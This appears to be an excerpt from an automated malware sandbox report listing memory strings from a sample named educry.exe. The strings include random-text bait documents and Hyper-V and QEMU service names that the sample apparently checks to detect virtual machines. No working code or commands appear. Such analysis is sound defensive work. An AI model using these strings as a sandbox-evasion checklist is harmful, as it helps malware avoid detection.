            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: Files\2\IVHSHTCODI\IVHSHTCODI.docxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: "Files\1\IVHSHTCODI\IVHSHTCODI.docxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: Files\1\JDSOXXXWOA\IVHSHTCODI.xlsxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: ]IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: Files\2\IVHSHTCODI.xlsxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: "Files\2\IVHSHTCODI\IVHSHTCODI.docxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: Files\1\IVHSHTCODI.docxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, educry.exe, 00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: educry.exe, 00000001.00000003.262106055.000000001E064000.00000004.00000001.sdmpBinary or memory string: EGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFM
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWface
            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: "Files\2\JDSOXXXWOA\IVHSHTCODI.xlsxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.262106055.000000001E064000.00000004.00000001.sdmpBinary or memory string: KLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZU
            Source: educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: educry.exe, 00000000.00000002.206589842.00000000047DA000.00000004.00000001.sdmp, educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: Files\2\JDSOXXXWOA\IVHSHTCODI.xlsxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000002.263997938.000000000246A000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: Files\1\IVHSHTCODI.xlsxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.257385378.000000001F3C0000.00000004.00000001.sdmpBinary or memory string: "Files\1\JDSOXXXWOA\IVHSHTCODI.xlsxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
            Source: educry.exe, 00000001.00000003.262106055.000000001E064000.00000004.00000001.sdmpBinary or memory string: EGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMFPK4B
            Source: educry.exe, 00000001.00000003.257331137.000000001F3BC000.00000004.00000001.sdmpBinary or memory string: Files\2\IVHSHTCODI.docxIVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIK